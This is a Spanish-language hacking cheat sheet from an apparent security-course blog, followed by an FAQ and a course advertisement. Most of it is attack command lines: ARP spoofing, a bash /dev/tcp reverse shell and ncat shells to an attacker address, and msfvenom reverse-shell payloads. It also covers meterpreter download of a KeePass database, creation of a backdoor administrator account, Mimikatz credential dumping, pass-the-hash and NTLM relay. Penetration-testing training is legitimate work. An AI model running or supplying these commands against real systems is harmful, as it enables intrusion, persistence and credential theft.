Tienes innumerables herramientas de hacking a tu disposición, pero sólo tienen valor si las utilizas en todo su potencial. Nuestra Guía Completa de Herramientas de Hacking le mostrará las mejores herramientas para trabajos específicos y cómo usarlas.

No pierda el tiempo solucionando un problema en vano cuando existe una herramienta perfecta. Domina estas herramientas ahora y conviértete en el hacker que siempre quisiste ser. 

¿Te gustaría enterarte de cuando lanzamos descuentos y nuevos cursos?

Herramientas básicas de red de Linux

MOSTRAR CONFIGURACIÓN IP:
# ip a lw
BÚSQUEDA DE DNS:
# dig achirou.com
CAMBIAR DIRECCIÓN IP/MAC:
ip link set dev eth0 down
macchanger -m 23:05:13:37:42:21 eth0
ip link set dev eth0 up
CONFIGURACIÓN DE LA DIRECCIÓN IP ESTÁTICA:
ip addr add 10.5.23.42/24 dev eth0

Recopilación de información

REVERSE DNS LOOKUP:
# dig -x 10.5.23.42
O USANDO UN SCRIP NMAP:
# nmap -sn -Pn achirou.com
–script hostmap-crtsh
COMBINE VARIAS FUENTES PARA ENUMERAR SUBDOMINIOS:
# amass enum -src -brute -min-forrecursive
2 -d achirou.com
ENCONTRAR PROPIETARIO/CONTACTO DE DOMINIO O DIRECCIÓN IP:
# whois achirou.com
GET NAMESERVERS AND TEST FOR DNS ZONE TRANSFER:
# dig achirou.com ns
# dig achirou.com axfr @n1.example.com
GET HOSTNAMES FROM CT LOGS: SEARCH FOR:
%.achirou.com on https://crt.sh.

Herramientas TCP

ESCUCHA EN EL PUERTO TCP:
# ncat -l -p 1337
CONECTARSE AL PUERTO TCP:
#ncat 10.5.23.42 1337

Herramientas TLS

CREAR CERTIFICADO AUTOFIRMADO:
# openssl req -x509 -newkey rsa:2048
-keyout key.pem -out cert.pem -nodes
-subj “/CN=example.org/”
CONECTARSE AL SERVICIO TLS USANDO OPENSSL:
# openssl s_client -connect
10.5.23.42:1337
PRUEBA DEL CERTIFICADO Y CIFRAS DEL SERVIDOR TLS:
# sslyze –regular 10.5.23.42:443
PRUEBAS TLS EN LÍNEA:
ssllabs.com, hardenize.com
INICIAR SERVIDOR TLS:
# ncat –ssl -l -p 1337 –ssl-cert
cert.pem –ssl-key key.pem
CONECTARSE AL SERVICIO TLS:
# ncat –ssl 10.5.23.42 1337
MOSTRAR DETALLES DEL CERTIFICADO:
# openssl s_client -connect
10.5.23.42:1337 | openssl x509 -text
PROXY DE TCP A TLS:
# socat TCP-LISTEN:2305,fork,reuseaddr
ssl:example.com:443

Herramientas HTTP

INICIAR EL SERVIDOR WEB PYTHON EN EL PUERTO 2305:
# python3 -m http.server 2305
OPCIONES ÚTILES DE  CURL:
-k: Accept untrusted certificates
-d “foo=bar”: HTTP POST data
-H: “Foo: Bar”: HTTP header
-I: Perform HEAD request
-L: Follow redirects
-o foobar.html: Write output file
–proxy http://127.0.0.1:8080: Set proxy
REALIZAR SOLICITUD HTTP:
# curl http://10.5.23.42:2305/?foo=bar
ESCANEAR EN BUSCA DE ARCHIVOS/APLICACIONES/CONFIGURACIONES COMUNES:
# nikto -host https://example.net
NUMERAR DIRECTORIO COMÚN/NOMBRES DE ARCHIVO:
# gobuster dir -k -u
https://example.net -w
/usr/share/wordlists/dirb/common.txt

Sniffing

ARP SPOOFING:
# arpspoof -t 10.5.23.42 10.5.23.1
MOSTRAR CACHÉ ARP:
# ip neigh
SNIFF TRÁFICO:
# tcpdump [options] [filters]
FILTROS TCPDUMP ÚTILES:
not arp: No ARP packets
port ftp or port 23: Only port 21 or 23
host 10.5.23.31: Only from/to host
net 10.5.23.0/24: Only from/to hosts in
O UNA HERRAMIENTA GRÁFICA:
# ettercap -G
ELIMINAR CACHÉ ARP:
# ip neigh flush all
OPCIONES ÚTILES DE TCPDUMP:
# tcpdump [options] [filters]
-n: Disable name and port resolution
-A: Print in ASCII
-XX: Print in hex and ASCII
-w file: Write output PCAP file
-r file: Read PCAP file
RED
Sniffing avanzado usando tshark o Wireshark.
SNIFFING SOBRE SSH EN UN HOST REMOTO:
# ssh 10.5.23.42 tcpdump -w- port not
ssh | wireshark -k -i –
MOSTRAR IMÁGENES TRANSMITIDAS:
# driftnet
BÚSQUEDA EN TRÁFICO DE RED:
# ngrep -i password
MOSTRAR SOLICITUDES DE GET HTTP:
# urlsnarf

Escaneo de red

ARP SCAN:
# nmap -n -sn -PR 10.5.23.0/24
ESCANEAR EN BUSCA DE VULNERABILIDADES (FILTRO DE CATEGORÍA DE SCRIPT):
# nmap -n -Pn –script “vuln and safe”
10.5.23.0/24
OPCIONES ÚTILES DE NMAP:
-n: Disable name and port resolution
-PR: ARP host discovery
-Pn: Disable host discovery
-sn: Disable port scan (host discovery only)
-sS/-sT/-sU: SYN/TCP connect/UDP scan
–top-ports 50: Scan 50 top ports
-iL file: Host input file
-oA file: Write output files (3 types)
-sC: Script scan (default scripts)
–script : Specific scripts
-sV: Version detection
-6: IPv6 scan
BÚSQUEDA DNS INVERSA DEL RANGO IP:
# nmap -sL 10.5.23.0/24
ESCANEO TCP (ESCANEO SINCRONIZADO = ESCANEO MEDIO ABIERTO):
# nmap -Pn -n -sS -p
22,25,80,443,8080 10.5.23.0/24
ESCANEAR EN BUSCA DE HOST VULNERABLES DE ETERNALBLUE:
# nmap -n -Pn -p 443 –script smbvuln-
ms17-010 10.5.23.0/24
SINTONIZACIÓN DE RENDIMIENTO (1 SYN PACKET ≈ 60 BYTES → 20’000 PACKETS/S ≈ 10 MBPS):
# nmap -n -Pn –min-rate 20000
10.5.23.0/24
DESCUBRIMIENTO DE HOST NMAP (ARP, ICMP, SYN 443/TCP, ACK 80/TCP):
# nmap -sn -n 10.5.23.0/24
LISTA DE SCRIPTS NMAP:
# ls /usr/share/nmap/scripts

El objetivo se puede especificar mediante notación CIDR (10.5.23.0/24) o definiciones de rango (10.13-37.5.1-23).

ESCANEO RÁPIDO USANDO MASSCAN:
# masscan -p80,8000-8100 –rate 20000
10.0.0.0/8
BASES DE DATOS DE ESCANEO PÚBLICO EN INTERNET:
shodan.io, censys.io

Shells

INICIAR BIND SHELL (EN LA VÍCTIMA:
# ncat -l -p 2305 -e “/bin/bash -i”
ESCUCHA EL SHELL INVERTIDO (EN EL ATACANTE):
# ncat -l -p 23
INICIAR EL SHELL INVERTIDO SÓLO CON BASH (EN LA VÍCTIMA):
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1
CONECTARSE A BIND SHELL (EN EL ATACANTE):
# ncat 10.5.23.42 2305
INICIAR CONCHA INVERSA (EN LA VÍCTIMA):
# ncat -e “/bin/bash -i” 10.5.23.5 23
ACTUALIZACIÓN A PSEUDO TERMINAL:
# python -c ‘import pty;
pty.spawn(“/bin/bash”)’

Bases de datos de vulnerabilidad y exploits

BÚSQUEDA DE EXPLOIT (COPIA LOCAL DE EXPLOIT-DB):

# searchsploit apache
MOSTRAR LA RUTA DEL ARCHIVO EXPLOTAR Y COPIARLA EN EL PORTAPAPELES:
# searchsploit -p 40142
BASES DE DATOS DE VULNERABILIDAD Y EXPLOTACIÓN EN LÍNEA:
cvedetails.com, exploit-db.com,
packetstormsecurity.com

Cracking

PRUEBA CONTRASEÑAS SSH DE UNA LISTA DE PALABRAS:
# ncrack -p 22 –user root -P
./passwords.txt 10.5.23.0/24
CRACK HASHES (Ejemplo: 5600 para tipo NETNTLMV2):
# hashcat -m 5600 -a 0 hash.txt
/path/to/wordlists/*
DETERMINAR EL TIPO DE HASH:
# hashid 869d[…]bd88
MUESTRA TIPOS DE HASH DE EJEMPLO PARA HASHCAT:
# hashcat –example-hashes
CRACK HASHES USANDO JOHN THE RIPPER:
# john hashes.txt

Metasploit Framework

INICIAR METASPLOIT:

# msfconsole
USE EXPLOIT:
msf > use exploit/windows/smb/ms17_…
CONFIGURAR EXPLOTACIÓN:
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42
REVERSE SHELL LISTENER:
> use exploit/multi/handler
> set payload
linux/x64/shell_reverse_tcp
> set LHOST 10.5.23.42 # attacker
> set LPORT 443
> exploit
SUBIR/DESCARGAR ARCHIVOS:
meterpreter > upload pwn.exe
meterpreter > download c:\keepass.kdb
SESIÓN DE ANTECEDENTES DE METERPRETER:
meterpreter > background
SOCKS MEDIANTE METERPRETER (REQUIERE AUTOROUTE):
> use auxiliary/server/socks4a
> set SRVPORT 8080
> run
CONÉCTATE A TRAVÉS DE SOCKS PROXY:

# proxychains ncat 172.23.5.42 1337
BUSCAR EXPLOIT:
> search eternalblue
EJECUTAR EXPLOTACIÓN:
msf exploit(…) > exploit
GENERAR REVERSE SHELL (WAR):
# msfvenom -p
java/jsp_shell_reverse_tcp LHOST=<your
ip address> LPORT=443 -f war > sh.war
ACTUALIZAR A METERPRETER (O PRESIONAR ^Z (CTRL-Z)):
background
Background session 1? [y/N] y
> sessions # list sessions
> sessions -u 1 # Upgrade
> sessions 2 # interact with session 2
meterpreter > sysinfo # use it
ENVÍO DE PUERTO A LOCALHOST:
meterpreter > portfwd add -l 2323 -p
3389 -r 10.5.23.23
PIVOTAR A TRAVÉS DE LA SESIÓN DE METERPRETER EXISTENTE:
> use post/multi/manage/autoroute
> set session 2 # meterpreter session
> run
> route
CONFIGURAR PROXYCHAINS:
# vi /etc/proxychains.conf
[…]
socks4 127.0.0.1 1080

Escalada de privilegios de Linux

NUMERA INFORMACIÓN LOCAL (-T PARA MÁS PRUEBAS):
# curl -o /tmp/linenum
https://raw.githubusercontent.com/rebo
otuser/LinEnum/master/LinEnum.sh
# bash /tmp/linenum -r /tmp/report
Other hardening checks can be done using lynis or LinPEAS.
Use sudo/SUID/capabilities/etc. exploits from gtfobins.github.io.

Escalada de privilegios de Windows

ESCANEAR EN BUSCA DE RECURSOS COMPARTIDOS DE RED:
# smbmap.py –host-file smbhosts.txt –
u Administrator -p PasswordOrHash
Copy PowerUp.ps1 from GitHub «PowerShellMafia/
PowerSploit» into PowerShell to
bypass ExecutionPolicy and execute Invoke-
AllChecks. Use the abuse functions.
AÑADIR UN NUEVO ADMINISTRADOR LOCAL:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators
backdoor /add

Recopilación de credenciales de Windows

INICIAR MIMIKATZ Y CREAR ARCHIVO DE REGISTRO:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
MOSTRAR CONTRASEÑAS/HASHES DE USUARIOS INICIADOS:
# sekurlsa::logonpasswords
EXTRAER HASHES USANDO MIMIKATZ:
# lsadump::sam /system:system.hiv
/sam:sam.hiv
LEA EL VOLCADO DEL PROCESO LSASS.EXE:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.
SISTEMA DE RESPALDO Y SAM HIVE:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv

Pass-the-Hash

INICIAR MIMIKATZ Y CREAR ARCHIVO DE REGISTRO:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
MEDIDOR A TRAVÉS DE PASS-THE-HASH:
msf > set payload
windows/meterpreter/reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > set RHOST 10.5.23.21 # victim
msf > set SMBPass 01[…]03:01[…]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>
SOBRE UNA SUBRED Y EXTRAER ARCHIVO SAM:
# crackmapexec -u Administrator -H
:011AD41795657A8ED80AB3FF6F078D03
10.5.23.0/24 –sam
RDP A TRAVÉS DE PASS-THE-HASH:
# xfreerdp /u:user /d:domain /pth:
011AD41795657A8ED80AB3FF6F078D03
/v:10.5.23.42
BUSCA ACCIONES A TRAVÉS DE PASS-THE-HASH:
# ./smbclient.py
domain/usrname@10.5.23.42 -hashes
:011AD41795657A8ED80AB3FF6F078D03

NTLM Relay

VULNERABLE SI MESSAGE_SIGNING: DESHABILITADO:
# nmap -n -Pn -p 445 –script smbsecurity-
mode 10.5.23.0/24
NTLM RELAY  USANDO SOCKS PROXY:
# ./ntlmrelayx.py -tf targets.txt
-smb2support -socks
Configure ProxyChains:
# vi /etc/proxychains.conf
[…]
socks4 127.0.0.1 1080
DESHABILITE SMB Y HTTP EN RESPONDER.CONF E INICIAR RESPONDER:
# ./Responder.py -I eth0
NTLM RELAY PARA OBTENER Y EXTRAER EL ARCHIVO SAM:
# ./ntlmrelayx.py -smb2support -t
smb://10.5.23.42
ACCEDER A ARCHIVOS A TRAVÉS DE SOCKS PROXY:
# proxychains smbclient -m smb3
‘\\10.5.23.42\C$’ -W pc05 -U
Administrator%invalidPwd

Active Directory

Utilice SharpHound para recopilar información e importarla a Bloodhound para analizarla.
Descargue PingCastle de pingcastle.com y genere un informe.

Preguntas frecuentes

¿Qué utilizan la mayoría de los hackers para hackear?

Hay varias herramientas que los HACKERS utilizan para realizar piratería. Lo más común es que los HACKERS utilicen:

  • Nmap para escanear una red
  • Herramientas como Netcat o Meterpreter para detectar shells
  • Hashcat para descifrar contraseñas
  • Metasploit para administrar sesiones y lanzar exploits
  • Mimikatz para la recopilación de credenciales de Windows

Consulte nuestra lista de  Las 250 Mejores Herramientas para Hackers para más información.

¿Cuál es el primer paso del hackeo?

Suponiendo que ya pasó por el proceso de obtener permiso por escrito del propietario del sistema para realizar una prueba y confirmó que recibió la dirección IP de destino correcta, el primer paso sería el escaneo y la enumeración (a veces denominado simplemente reconocimiento).

¿Hackear es un delito?

Hackear no es un delito, pero piratear un sistema sin el permiso del propietario es un delito y puede acarrear repercusiones legales muy graves.

¿Qué codificación utilizan los hackers?

Los hackers suelen estar familiarizados con lenguajes de programación como Bash, Powershell y Python. Otros lenguajes de codificación pueden depender de su especialidad (como C para desarrolladores de exploits o Java para probadores de penetración de aplicaciones web).

¿Qué tipo de hacker es mejor?

Si por tipos se refiere a:

  • Hackers de Sombrero blanco (hackers éticos que auditan sistemas con permiso)
  • Hackers de Sombrero negro (hackers criminales que generalmente buscan dañar un sistema)
  • Hackers de Sombrero gris (hackers con buenas intenciones pero aún así piratean un sistema sin permiso)
  • Hackers de sombrero Rojo (vigilantes que piratean hackers de sombrero negro)

Entonces preferimos los sombreros blancos. Buscan hacer de internet un lugar más seguro y siempre con el consentimiento del propietario del sistema. También se benefician de no enfrentar cargos penales y, en promedio, ganan más dinero que los otros tipos.

¿Qué quieren los hackers?

Diferentes hackers quieren cosas diferentes. Algunos quieren ayudar a defender los sistemas de manera legal, otros quieren defender los sistemas de manera ilegal, algunos quieren dañar los sistemas por diversión o ganancias, y otros tienen motivaciones completamente diferentes.

Lo único en común es que los hackers quieren ver cómo funciona un sistema e intentar hacerlo actuar de una manera para la que no fue diseñado.

No te detengas, sigue avanzando

Aquí tienes un propósito para este 2024 que debes considerar seriamente: si has querido mejorar tus habilidades en hacking, Ciberseguridad y programación ahora es definitivamente el momento de dar el siguiente paso. ¡Desarrolla tus habilidades aprovechando nuestros cursos a un precio increíble y avanza en tu carrera!

Universidad Hacking. Todo en Ciberseguridad. Curso Completo

Aprende Hacking Ético y Ciberseguridad sin necesitar conocimientos Previos. Practica Hacking Ético y Ciberseguridad aquí

Calificación: 4,6 de 54,6 (2.877 calificaciones) 15.284 estudiantes Creado por Alvaro Chirou • 1.800.000+ Enrollments Worldwide

Lo que aprenderás

  • Aprende Seguridad informática
  • Te enseñare Hacking Ético
  • Veremos Ciberseguridad
  • La base principal del Hacking, Redes
  • Esto es alternativo que puedes aprender, Programación (python)
  • Necesitaras saber Python para, Hacking con Python
  • Te enseñare Análisis de Malware, además haremos laboratorios, practicas y ejecutaremos Malware para que veas su comportamiento
  • Te enseñare a reforzar tu Privacidad y Anonimato
  • Aprenderás una de las herramientas mas populares por excelencia en el mundo del Hacking, Metasploit
  • Es importante que aprendas Seguridad informática Mobile ya que usamos nuestro celular como una PC
  • Veremos también el top 10 de Owasp Web
  • Veremos también el top 10 de Owasp mobile
  • Veremos también el top 10 de Owasp API
  • Ante la demanda del mercado, te enseñare Seguridad informática para empresas
  • Veras también la suit de herramientas de seguridad informática en un sistema operativo, Kali Linux
  • Herramientas de hacking para el celular en Termux
  • Seguridad informática en WordPress
  • Análisis de trafico en Wireshark

El Hacking Ético y Ciberseguridad es Transversal a todo lo que sea Tecnología. Es decir, cualquier dispositivo inteligente, sea Celular, Computadora, o hasta hoy un Vehículo, debe haber Seguridad informática.

¿Esto que significa?

Que hoy más que nunca, se necesitan personas capacitadas en este rubro para trabajar.

Por esa razón cree esta formación profesional para compartirte mis conocimientos y experiencia en la materia y puedas iniciar en este mundo del Hacking Ético y Ciberseguridad.

Te voy a estar acompañando en el proceso de aprendizaje, donde si estas empezando desde 0, sin conocimientos previos, no es un impedimento ya que iniciaremos como si no supieras nada de la materia.

Y si sos una persona con conocimientos, podrás iniciar directamente en el nivel más avanzado o en el que tu elijas.

Como en todos mis cursos en udemy, tendrás muchísima practica para que materialices lo que vas aprendiendo.

Empieza a aprender ya mismo!

¿Te gustaría enterarte de cuando lanzamos descuentos y nuevos cursos?

Sobre los autores

Álvaro Chirou

Yo soy Álvaro Chirou, tengo más de 20 Años de experiencia trabajando en Tecnología, eh dado disertaciones en eventos internacionales como OWASP, tengo más de 1.800.000 estudiantes en Udemy y 100 formaciones profesionales impartidas en la misma. Puedes serguirme en mis redes:

Laprovittera Carlos

Soy Laprovittera Carlos. Con más de 20 años de experiencia en IT brindo Educación y Consultoría en Seguridad de la Información para profesionales, bancos y empresas. Puedes saber más de mi y de mis servicios en mi sitio web: laprovittera.com y seguirme en mis redes:

¿Quieres iniciarte en hacking y ciberseguridad pero no sabes por dónde empezar? Inicia leyendo nuestra guia gratuita: https://achirou.com/como-iniciarse-en-ciberseguridad-y-hacking-en-2024/ que te lleva de 0 a 100. Desde los fundamentos más básicos, pasando por cursos, recursos y certificaciones hasta cómo obtener tu primer empleo.

Cómo Iniciarse en Hacking y Ciberseguridad en 2024